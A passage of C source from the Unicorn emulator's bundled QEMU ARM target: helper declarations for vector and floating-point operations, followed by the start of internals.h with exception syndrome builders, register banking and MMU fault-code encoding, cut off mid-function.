DEF_HELPER_FLAGS_4(gvec_sdot_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_udot_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_sdot_idx_b, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_udot_idx_b, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_sdot_idx_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_udot_idx_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(gvec_fcaddh, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(gvec_fcadds, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(gvec_fcaddd, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(gvec_fcmlah, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(gvec_fcmlah_idx, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(gvec_fcmlas, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(gvec_fcmlas_idx, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(gvec_fcmlad, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_frecpe_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_frecpe_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_frecpe_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_frsqrte_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_frsqrte_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_frsqrte_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(gvec_fadd_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(gvec_fadd_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(gvec_fadd_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(gvec_fsub_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(gvec_fsub_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(gvec_fsub_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(gvec_fmul_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(gvec_fmul_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(gvec_fmul_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(gvec_ftsmul_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(gvec_ftsmul_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(gvec_ftsmul_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(gvec_fmul_idx_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(gvec_fmul_idx_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(gvec_fmul_idx_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_6(gvec_fmla_idx_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_6(gvec_fmla_idx_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_6(gvec_fmla_idx_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(gvec_uqadd_b, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(gvec_uqadd_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(gvec_uqadd_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(gvec_uqadd_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(gvec_sqadd_b, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(gvec_sqadd_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) 
DEF_HELPER_FLAGS_5(gvec_sqadd_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32)
DEF_HELPER_FLAGS_5(gvec_sqadd_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32)
DEF_HELPER_FLAGS_5(gvec_uqsub_b, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32)
DEF_HELPER_FLAGS_5(gvec_uqsub_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32)
DEF_HELPER_FLAGS_5(gvec_uqsub_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32)
DEF_HELPER_FLAGS_5(gvec_uqsub_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32)
DEF_HELPER_FLAGS_5(gvec_sqsub_b, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32)
DEF_HELPER_FLAGS_5(gvec_sqsub_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32)
DEF_HELPER_FLAGS_5(gvec_sqsub_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32)
DEF_HELPER_FLAGS_5(gvec_sqsub_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32)

DEF_HELPER_FLAGS_5(gvec_fmlal_a32, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32)
DEF_HELPER_FLAGS_5(gvec_fmlal_a64, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32)
DEF_HELPER_FLAGS_5(gvec_fmlal_idx_a32, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32)
DEF_HELPER_FLAGS_5(gvec_fmlal_idx_a64, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32)

DEF_HELPER_FLAGS_2(frint32_s, TCG_CALL_NO_RWG, f32, f32, ptr)
DEF_HELPER_FLAGS_2(frint64_s, TCG_CALL_NO_RWG, f32, f32, ptr)
DEF_HELPER_FLAGS_2(frint32_d, TCG_CALL_NO_RWG, f64, f64, ptr)
DEF_HELPER_FLAGS_2(frint64_d, TCG_CALL_NO_RWG, f64, f64, ptr)

DEF_HELPER_FLAGS_4(gvec_sshl_b, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32)
DEF_HELPER_FLAGS_4(gvec_sshl_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32)
DEF_HELPER_FLAGS_4(gvec_ushl_b, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32)
DEF_HELPER_FLAGS_4(gvec_ushl_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32)

DEF_HELPER_FLAGS_4(gvec_pmul_b, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32)
DEF_HELPER_FLAGS_4(gvec_pmull_q, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32)

DEF_HELPER_FLAGS_4(neon_pmull_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32)

#ifdef TARGET_AARCH64
#include "helper-a64.h"
#include "helper-sve.h"
#endif
unicorn-2.1.1/qemu/target/arm/internals.h000066400000000000000000000112242146752410670020372 0ustar00rootroot00000000000000
/*
 * QEMU ARM CPU -- internal functions and types
 *
 * Copyright (c) 2014 Linaro Ltd
 *
 * This program is free software; you can redistribute it and/or
 * modify it under the terms of the GNU General Public License
 * as published by the Free Software Foundation; either version 2
 * of the License, or (at your option) any later version.
 *
 * This program is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 * GNU General Public License for more details.
* * You should have received a copy of the GNU General Public License * along with this program; if not, see * <http://www.gnu.org/licenses/gpl-2.0.html> * * This header defines functions, types, etc which need to be shared * between different source files within target/arm/ but which are * private to it and not required by the rest of QEMU. */ #ifndef TARGET_ARM_INTERNALS_H #define TARGET_ARM_INTERNALS_H #include "hw/registerfields.h" struct uc_struct; /* register banks for CPU modes */ #define BANK_USRSYS 0 #define BANK_SVC 1 #define BANK_ABT 2 #define BANK_UND 3 #define BANK_IRQ 4 #define BANK_FIQ 5 #define BANK_HYP 6 #define BANK_MON 7 static inline bool excp_is_internal(int excp) { /* Return true if this exception number represents a QEMU-internal * exception that will not be passed to the guest. */ return excp == EXCP_INTERRUPT || excp == EXCP_HLT || excp == EXCP_DEBUG || excp == EXCP_HALTED || excp == EXCP_EXCEPTION_EXIT || excp == EXCP_KERNEL_TRAP || excp == EXCP_SEMIHOST; } /* Scale factor for generic timers, ie number of ns per tick. * This gives a 62.5MHz timer. */ #define GTIMER_SCALE 16 /* Bit definitions for the v7M CONTROL register */ FIELD(V7M_CONTROL, NPRIV, 0, 1) FIELD(V7M_CONTROL, SPSEL, 1, 1) FIELD(V7M_CONTROL, FPCA, 2, 1) FIELD(V7M_CONTROL, SFPA, 3, 1) /* Bit definitions for v7M exception return payload */ FIELD(V7M_EXCRET, ES, 0, 1) FIELD(V7M_EXCRET, RES0, 1, 1) FIELD(V7M_EXCRET, SPSEL, 2, 1) FIELD(V7M_EXCRET, MODE, 3, 1) FIELD(V7M_EXCRET, FTYPE, 4, 1) FIELD(V7M_EXCRET, DCRS, 5, 1) FIELD(V7M_EXCRET, S, 6, 1) FIELD(V7M_EXCRET, RES1, 7, 25) /* including the must-be-1 prefix */ /* Minimum value which is a magic number for exception return */ #define EXC_RETURN_MIN_MAGIC 0xff000000 /* Minimum number which is a magic number for function or exception return * when using v8M security extension */ #define FNC_RETURN_MIN_MAGIC 0xfefffffe /* We use a few fake FSR values for internal purposes in M profile. * M profile cores don't have A/R format FSRs, but currently our * get_phys_addr() code assumes A/R profile and reports failures via * an A/R format FSR value. We then translate that into the proper * M profile exception and FSR status bit in arm_v7m_cpu_do_interrupt(). * Mostly the FSR values we use for this are those defined for v7PMSA, * since we share some of that codepath. A few kinds of fault are * only for M profile and have no A/R equivalent, though, so we have * to pick a value from the reserved range (which we never otherwise * generate) to use for these. * These values will never be visible to the guest. */ #define M_FAKE_FSR_NSC_EXEC 0xf /* NS executing in S&NSC memory */ #define M_FAKE_FSR_SFAULT 0xe /* SecureFault INVTRAN, INVEP or AUVIOL */ /** * raise_exception: Raise the specified exception. * Raise a guest exception with the specified value, syndrome register * and target exception level. This should be called from helper functions, * and never returns because we will longjump back up to the CPU main loop. */ void QEMU_NORETURN raise_exception(CPUARMState *env, uint32_t excp, uint32_t syndrome, uint32_t target_el); /* * Similarly, but also use unwinding to restore cpu state. */ void QEMU_NORETURN raise_exception_ra(CPUARMState *env, uint32_t excp, uint32_t syndrome, uint32_t target_el, uintptr_t ra); /* * For AArch64, map a given EL to an index in the banked_spsr array. * Note that this mapping and the AArch32 mapping defined in bank_number() * must agree such that the AArch64<->AArch32 SPSRs have the architecturally * mandated mapping between each other. 
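 * EL0 has no SPSR of its own, which is why the map below starts at EL1.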
*/ static inline unsigned int aarch64_banked_spsr_index(unsigned int el) { static const unsigned int map[4] = { [1] = BANK_SVC, /* EL1. */ [2] = BANK_HYP, /* EL2. */ [3] = BANK_MON, /* EL3. */ }; assert(el >= 1 && el <= 3); return map[el]; } /* Map CPU modes onto saved register banks. */ static inline int bank_number(int mode) { switch (mode) { case ARM_CPU_MODE_USR: case ARM_CPU_MODE_SYS: return BANK_USRSYS; case ARM_CPU_MODE_SVC: return BANK_SVC; case ARM_CPU_MODE_ABT: return BANK_ABT; case ARM_CPU_MODE_UND: return BANK_UND; case ARM_CPU_MODE_IRQ: return BANK_IRQ; case ARM_CPU_MODE_FIQ: return BANK_FIQ; case ARM_CPU_MODE_HYP: return BANK_HYP; case ARM_CPU_MODE_MON: return BANK_MON; } g_assert_not_reached(); // never reach return BANK_MON; } /** * r14_bank_number: Map CPU mode onto register bank for r14 * * Given an AArch32 CPU mode, return the index into the saved register * banks to use for the R14 (LR) in that mode. This is the same as * bank_number(), except for the special case of Hyp mode, where * R14 is shared with USR and SYS, unlike its R13 and SPSR. * This should be used as the index into env->banked_r14[], and * bank_number() used for the index into env->banked_r13[] and * env->banked_spsr[]. */ static inline int r14_bank_number(int mode) { return (mode == ARM_CPU_MODE_HYP) ? BANK_USRSYS : bank_number(mode); } void arm_cpu_register_gdb_regs_for_features(ARMCPU *cpu); void arm_translate_init(struct uc_struct *uc); enum arm_fprounding { FPROUNDING_TIEEVEN, FPROUNDING_POSINF, FPROUNDING_NEGINF, FPROUNDING_ZERO, FPROUNDING_TIEAWAY, FPROUNDING_ODD }; int arm_rmode_to_sf(int rmode); static inline void aarch64_save_sp(CPUARMState *env, int el) { if (env->pstate & PSTATE_SP) { env->sp_el[el] = env->xregs[31]; } else { env->sp_el[0] = env->xregs[31]; } } static inline void aarch64_restore_sp(CPUARMState *env, int el) { if (env->pstate & PSTATE_SP) { env->xregs[31] = env->sp_el[el]; } else { env->xregs[31] = env->sp_el[0]; } } static inline void update_spsel(CPUARMState *env, uint32_t imm) { unsigned int cur_el = arm_current_el(env); /* Update PSTATE SPSel bit; this requires us to update the * working stack pointer in xregs[31]. */ if (!((imm ^ env->pstate) & PSTATE_SP)) { return; } aarch64_save_sp(env, cur_el); env->pstate = deposit32(env->pstate, 0, 1, imm); /* We rely on illegal updates to SPsel from EL0 to get trapped * at translation time. */ assert(cur_el >= 1 && cur_el <= 3); aarch64_restore_sp(env, cur_el); } /* * arm_pamax * @cpu: ARMCPU * * Returns the implementation defined bit-width of physical addresses. * The ARMv8 reference manuals refer to this as PAMax(). */ static inline unsigned int arm_pamax(ARMCPU *cpu) { static const unsigned int pamax_map[] = { [0] = 32, [1] = 36, [2] = 40, [3] = 42, [4] = 44, [5] = 48, }; unsigned int parange = FIELD_EX64(cpu->isar.id_aa64mmfr0, ID_AA64MMFR0, PARANGE); /* id_aa64mmfr0 is a read-only register so values outside of the * supported mappings can be considered an implementation error. */ assert(parange < ARRAY_SIZE(pamax_map)); return pamax_map[parange]; } /* Return true if extended addresses are enabled. * This is always the case if our translation regime is 64 bit, * but depends on TTBCR.EAE for 32 bit. */ static inline bool extended_addresses_enabled(CPUARMState *env) { TCR *tcr = &env->cp15.tcr_el[arm_is_secure(env) ? 
3 : 1]; return arm_el_is_aa64(env, 1) || (arm_feature(env, ARM_FEATURE_LPAE) && (tcr->raw_tcr & TTBCR_EAE)); } /* Valid Syndrome Register EC field values */ enum arm_exception_class { EC_UNCATEGORIZED = 0x00, EC_WFX_TRAP = 0x01, EC_CP15RTTRAP = 0x03, EC_CP15RRTTRAP = 0x04, EC_CP14RTTRAP = 0x05, EC_CP14DTTRAP = 0x06, EC_ADVSIMDFPACCESSTRAP = 0x07, EC_FPIDTRAP = 0x08, EC_PACTRAP = 0x09, EC_CP14RRTTRAP = 0x0c, EC_BTITRAP = 0x0d, EC_ILLEGALSTATE = 0x0e, EC_AA32_SVC = 0x11, EC_AA32_HVC = 0x12, EC_AA32_SMC = 0x13, EC_AA64_SVC = 0x15, EC_AA64_HVC = 0x16, EC_AA64_SMC = 0x17, EC_SYSTEMREGISTERTRAP = 0x18, EC_SVEACCESSTRAP = 0x19, EC_INSNABORT = 0x20, EC_INSNABORT_SAME_EL = 0x21, EC_PCALIGNMENT = 0x22, EC_DATAABORT = 0x24, EC_DATAABORT_SAME_EL = 0x25, EC_SPALIGNMENT = 0x26, EC_AA32_FPTRAP = 0x28, EC_AA64_FPTRAP = 0x2c, EC_SERROR = 0x2f, EC_BREAKPOINT = 0x30, EC_BREAKPOINT_SAME_EL = 0x31, EC_SOFTWARESTEP = 0x32, EC_SOFTWARESTEP_SAME_EL = 0x33, EC_WATCHPOINT = 0x34, EC_WATCHPOINT_SAME_EL = 0x35, EC_AA32_BKPT = 0x38, EC_VECTORCATCH = 0x3a, EC_AA64_BKPT = 0x3c, }; #define ARM_EL_EC_SHIFT 26 #define ARM_EL_IL_SHIFT 25 #define ARM_EL_ISV_SHIFT 24 #define ARM_EL_IL (1 << ARM_EL_IL_SHIFT) #define ARM_EL_ISV (1 << ARM_EL_ISV_SHIFT) static inline uint32_t syn_get_ec(uint32_t syn) { return syn >> ARM_EL_EC_SHIFT; } /* Utility functions for constructing various kinds of syndrome value. * Note that in general we follow the AArch64 syndrome values; in a * few cases the value in HSR for exceptions taken to AArch32 Hyp * mode differs slightly, and we fix this up when populating HSR in * arm_cpu_do_interrupt_aarch32_hyp(). * The exception is FP/SIMD access traps -- these report extra information * when taking an exception to AArch32. For those we include the extra coproc * and TA fields, and mask them out when taking the exception to AArch64. */ static inline uint32_t syn_uncategorized(void) { return (EC_UNCATEGORIZED << ARM_EL_EC_SHIFT) | ARM_EL_IL; } static inline uint32_t syn_aa64_svc(uint32_t imm16) { return (EC_AA64_SVC << ARM_EL_EC_SHIFT) | ARM_EL_IL | (imm16 & 0xffff); } static inline uint32_t syn_aa64_hvc(uint32_t imm16) { return (EC_AA64_HVC << ARM_EL_EC_SHIFT) | ARM_EL_IL | (imm16 & 0xffff); } static inline uint32_t syn_aa64_smc(uint32_t imm16) { return (EC_AA64_SMC << ARM_EL_EC_SHIFT) | ARM_EL_IL | (imm16 & 0xffff); } static inline uint32_t syn_aa32_svc(uint32_t imm16, bool is_16bit) { return (EC_AA32_SVC << ARM_EL_EC_SHIFT) | (imm16 & 0xffff) | (is_16bit ? 0 : ARM_EL_IL); } static inline uint32_t syn_aa32_hvc(uint32_t imm16) { return (EC_AA32_HVC << ARM_EL_EC_SHIFT) | ARM_EL_IL | (imm16 & 0xffff); } static inline uint32_t syn_aa32_smc(void) { return (EC_AA32_SMC << ARM_EL_EC_SHIFT) | ARM_EL_IL; } static inline uint32_t syn_aa64_bkpt(uint32_t imm16) { return (EC_AA64_BKPT << ARM_EL_EC_SHIFT) | ARM_EL_IL | (imm16 & 0xffff); } static inline uint32_t syn_aa32_bkpt(uint32_t imm16, bool is_16bit) { return (EC_AA32_BKPT << ARM_EL_EC_SHIFT) | (imm16 & 0xffff) | (is_16bit ? 0 : ARM_EL_IL); } static inline uint32_t syn_aa64_sysregtrap(int op0, int op1, int op2, int crn, int crm, int rt, int isread) { return (EC_SYSTEMREGISTERTRAP << ARM_EL_EC_SHIFT) | ARM_EL_IL | (op0 << 20) | (op2 << 17) | (op1 << 14) | (crn << 10) | (rt << 5) | (crm << 1) | isread; } static inline uint32_t syn_cp14_rt_trap(int cv, int cond, int opc1, int opc2, int crn, int crm, int rt, int isread, bool is_16bit) { return (EC_CP14RTTRAP << ARM_EL_EC_SHIFT) | (is_16bit ? 
0 : ARM_EL_IL) | (cv << 24) | (cond << 20) | (opc2 << 17) | (opc1 << 14) | (crn << 10) | (rt << 5) | (crm << 1) | isread; } static inline uint32_t syn_cp15_rt_trap(int cv, int cond, int opc1, int opc2, int crn, int crm, int rt, int isread, bool is_16bit) { return (EC_CP15RTTRAP << ARM_EL_EC_SHIFT) | (is_16bit ? 0 : ARM_EL_IL) | (cv << 24) | (cond << 20) | (opc2 << 17) | (opc1 << 14) | (crn << 10) | (rt << 5) | (crm << 1) | isread; } static inline uint32_t syn_cp14_rrt_trap(int cv, int cond, int opc1, int crm, int rt, int rt2, int isread, bool is_16bit) { return (EC_CP14RRTTRAP << ARM_EL_EC_SHIFT) | (is_16bit ? 0 : ARM_EL_IL) | (cv << 24) | (cond << 20) | (opc1 << 16) | (rt2 << 10) | (rt << 5) | (crm << 1) | isread; } static inline uint32_t syn_cp15_rrt_trap(int cv, int cond, int opc1, int crm, int rt, int rt2, int isread, bool is_16bit) { return (EC_CP15RRTTRAP << ARM_EL_EC_SHIFT) | (is_16bit ? 0 : ARM_EL_IL) | (cv << 24) | (cond << 20) | (opc1 << 16) | (rt2 << 10) | (rt << 5) | (crm << 1) | isread; } static inline uint32_t syn_fp_access_trap(int cv, int cond, bool is_16bit) { /* AArch32 FP trap or any AArch64 FP/SIMD trap: TA == 0 coproc == 0xa */ return (EC_ADVSIMDFPACCESSTRAP << ARM_EL_EC_SHIFT) | (is_16bit ? 0 : ARM_EL_IL) | (cv << 24) | (cond << 20) | 0xa; } static inline uint32_t syn_simd_access_trap(int cv, int cond, bool is_16bit) { /* AArch32 SIMD trap: TA == 1 coproc == 0 */ return (EC_ADVSIMDFPACCESSTRAP << ARM_EL_EC_SHIFT) | (is_16bit ? 0 : ARM_EL_IL) | (cv << 24) | (cond << 20) | (1 << 5); } static inline uint32_t syn_sve_access_trap(void) { return EC_SVEACCESSTRAP << ARM_EL_EC_SHIFT; } static inline uint32_t syn_pactrap(void) { return EC_PACTRAP << ARM_EL_EC_SHIFT; } static inline uint32_t syn_btitrap(int btype) { return (EC_BTITRAP << ARM_EL_EC_SHIFT) | btype; } static inline uint32_t syn_insn_abort(int same_el, int ea, int s1ptw, int fsc) { return (EC_INSNABORT << ARM_EL_EC_SHIFT) | (same_el << ARM_EL_EC_SHIFT) | ARM_EL_IL | (ea << 9) | (s1ptw << 7) | fsc; } static inline uint32_t syn_data_abort_no_iss(int same_el, int ea, int cm, int s1ptw, int wnr, int fsc) { return (EC_DATAABORT << ARM_EL_EC_SHIFT) | (same_el << ARM_EL_EC_SHIFT) | ARM_EL_IL | (ea << 9) | (cm << 8) | (s1ptw << 7) | (wnr << 6) | fsc; } static inline uint32_t syn_data_abort_with_iss(int same_el, int sas, int sse, int srt, int sf, int ar, int ea, int cm, int s1ptw, int wnr, int fsc, bool is_16bit) { return ( (uint32_t)EC_DATAABORT << ARM_EL_EC_SHIFT) | ( (uint32_t)same_el << ARM_EL_EC_SHIFT) | (is_16bit ? 0 : ARM_EL_IL) | ARM_EL_ISV | (sas << 22) | (sse << 21) | (srt << 16) | (sf << 15) | (ar << 14) | (ea << 9) | (cm << 8) | (s1ptw << 7) | (wnr << 6) | fsc; } static inline uint32_t syn_swstep(int same_el, int isv, int ex) { return (EC_SOFTWARESTEP << ARM_EL_EC_SHIFT) | (same_el << ARM_EL_EC_SHIFT) | ARM_EL_IL | (isv << 24) | (ex << 6) | 0x22; } static inline uint32_t syn_watchpoint(int same_el, int cm, int wnr) { return (EC_WATCHPOINT << ARM_EL_EC_SHIFT) | (same_el << ARM_EL_EC_SHIFT) | ARM_EL_IL | (cm << 8) | (wnr << 6) | 0x22; } static inline uint32_t syn_breakpoint(int same_el) { return (EC_BREAKPOINT << ARM_EL_EC_SHIFT) | (same_el << ARM_EL_EC_SHIFT) | ARM_EL_IL | 0x22; } static inline uint32_t syn_wfx(int cv, int cond, int ti, bool is_16bit) { return (EC_WFX_TRAP << ARM_EL_EC_SHIFT) | (is_16bit ? 0 : (1 << ARM_EL_IL_SHIFT)) | (cv << 24) | (cond << 20) | ti; } /* Update a QEMU watchpoint based on the information the guest has set in the * DBGWCR<n>_EL1 and DBGWVR<n>_EL1 registers. 
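 * It is called from the DBGWVR/DBGWCR write handlers so that QEMU's
 * watchpoint list tracks the guest's debug register state.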
*/ void hw_watchpoint_update(ARMCPU *cpu, int n); /* Update the QEMU watchpoints for every guest watchpoint. This does a * complete delete-and-reinstate of the QEMU watchpoint list and so is * suitable for use after migration or on reset. */ void hw_watchpoint_update_all(ARMCPU *cpu); /* Update a QEMU breakpoint based on the information the guest has set in the * DBGBCR<n>_EL1 and DBGBVR<n>_EL1 registers. */ void hw_breakpoint_update(ARMCPU *cpu, int n); /* Update the QEMU breakpoints for every guest breakpoint. This does a * complete delete-and-reinstate of the QEMU breakpoint list and so is * suitable for use after migration or on reset. */ void hw_breakpoint_update_all(ARMCPU *cpu); /* Callback function for checking if a watchpoint should trigger. */ bool arm_debug_check_watchpoint(CPUState *cs, CPUWatchpoint *wp); /* Adjust addresses (in BE32 mode) before testing against watchpoint * addresses. */ vaddr arm_adjust_watchpoint_address(CPUState *cs, vaddr addr, int len); /* Callback function for when a watchpoint or breakpoint triggers. */ void arm_debug_excp_handler(CPUState *cs); /* Return true if the r0/x0 value indicates that this SMC/HVC is a PSCI call. */ bool arm_is_psci_call(ARMCPU *cpu, int excp_type); /* Actually handle a PSCI call */ void arm_handle_psci_call(ARMCPU *cpu); /** * arm_clear_exclusive: clear the exclusive monitor * @env: CPU env * Clear the CPU's exclusive monitor, like the guest CLREX instruction. */ static inline void arm_clear_exclusive(CPUARMState *env) { env->exclusive_addr = -1; } /** * ARMFaultType: type of an ARM MMU fault * This corresponds to the v8A pseudocode's Fault enumeration, * with extensions for QEMU internal conditions. */ typedef enum ARMFaultType { ARMFault_None, ARMFault_AccessFlag, ARMFault_Alignment, ARMFault_Background, ARMFault_Domain, ARMFault_Permission, ARMFault_Translation, ARMFault_AddressSize, ARMFault_SyncExternal, ARMFault_SyncExternalOnWalk, ARMFault_SyncParity, ARMFault_SyncParityOnWalk, ARMFault_AsyncParity, ARMFault_AsyncExternal, ARMFault_Debug, ARMFault_TLBConflict, ARMFault_Lockdown, ARMFault_Exclusive, ARMFault_ICacheMaint, ARMFault_QEMU_NSCExec, /* v8M: NS executing in S&NSC memory */ ARMFault_QEMU_SFault, /* v8M: SecureFault INVTRAN, INVEP or AUVIOL */ } ARMFaultType; /** * ARMMMUFaultInfo: Information describing an ARM MMU Fault * @type: Type of fault * @level: Table walk level (for translation, access flag and permission faults) * @domain: Domain of the fault address (for non-LPAE CPUs only) * @s2addr: Address that caused a fault at stage 2 * @stage2: True if we faulted at stage 2 * @s1ptw: True if we faulted at stage 2 while doing a stage 1 page-table walk * @ea: True if we should set the EA (external abort type) bit in syndrome */ typedef struct ARMMMUFaultInfo ARMMMUFaultInfo; struct ARMMMUFaultInfo { ARMFaultType type; target_ulong s2addr; int level; int domain; bool stage2; bool s1ptw; bool ea; }; /** * arm_fi_to_sfsc: Convert fault info struct to short-format FSC * Compare pseudocode EncodeSDFSC(), though unlike that function * we set up a whole FSR-format code including domain field and * putting the high bit of the FSC into bit 10. */ static inline uint32_t arm_fi_to_sfsc(ARMMMUFaultInfo *fi) { uint32_t fsc = 0; switch (fi->type) { case ARMFault_None: return 0; case ARMFault_AccessFlag: fsc = fi->level == 1 ? 0x3 : 0x6; break; case ARMFault_Alignment: fsc = 0x1; break; case ARMFault_Permission: fsc = fi->level == 1 ? 0xd : 0xf; break; case ARMFault_Domain: fsc = fi->level == 1 ? 
0x9 : 0xb; break; case ARMFault_Translation: fsc = fi->level == 1 ? 0x5 : 0x7; break; case ARMFault_SyncExternal: fsc = 0x8 | (fi->ea << 12); break; case ARMFault_SyncExternalOnWalk: fsc = fi->level == 1 ? 0xc : 0xe; fsc |= (fi->ea << 12); break; case ARMFault_SyncParity: fsc = 0x409; break; case ARMFault_SyncParityOnWalk: fsc = fi->level == 1 ? 0x40c : 0x40e; break; case ARMFault_AsyncParity: fsc = 0x408; break; case ARMFault_AsyncExternal: fsc = 0x406 | (fi->ea << 12); break; case ARMFault_Debug: fsc = 0x2; break; case ARMFault_TLBConflict: fsc = 0x400; break; case ARMFault_Lockdown: fsc = 0x404; break; case ARMFault_Exclusive: fsc = 0x405; break; case ARMFault_ICacheMaint: fsc = 0x4; break; case ARMFault_Background: fsc = 0x0; break; case ARMFault_QEMU_NSCExec: fsc = M_FAKE_FSR_NSC_EXEC; break; case ARMFault_QEMU_SFault: fsc = M_FAKE_FSR_SFAULT; break; default: /* Other faults can't occur in a context that requires a * short-format status code. */ g_assert_not_reached(); break; } fsc |= (fi->domain << 4); return fsc; } /** * arm_fi_to_lfsc: Convert fault info struct to long-format FSC * Compare pseudocode EncodeLDFSC(), though unlike that function * we fill in also the LPAE bit 9 of a DFSR format. */ static inline uint32_t arm_fi_to_lfsc(ARMMMUFaultInfo *fi) { uint32_t fsc = 0; switch (fi->type) { case ARMFault_None: return 0; case ARMFault_AddressSize: fsc = fi->level & 3; break; case ARMFault_AccessFlag: fsc = (fi->level & 3) | (0x2 << 2); break; case ARMFault_Permission: fsc = (fi->level & 3) | (0x3 << 2); break; case ARMFault_Translation: fsc = (fi->level & 3) | (0x1 << 2); break; case ARMFault_SyncExternal: fsc = 0x10 | (fi->ea << 12); break; case ARMFault_SyncExternalOnWalk: fsc = (fi->level & 3) | (0x5 << 2) | (fi->ea << 12); break; case ARMFault_SyncParity: fsc = 0x18; break; case ARMFault_SyncParityOnWalk: fsc = (fi->level & 3) | (0x7 << 2); break; case ARMFault_AsyncParity: fsc = 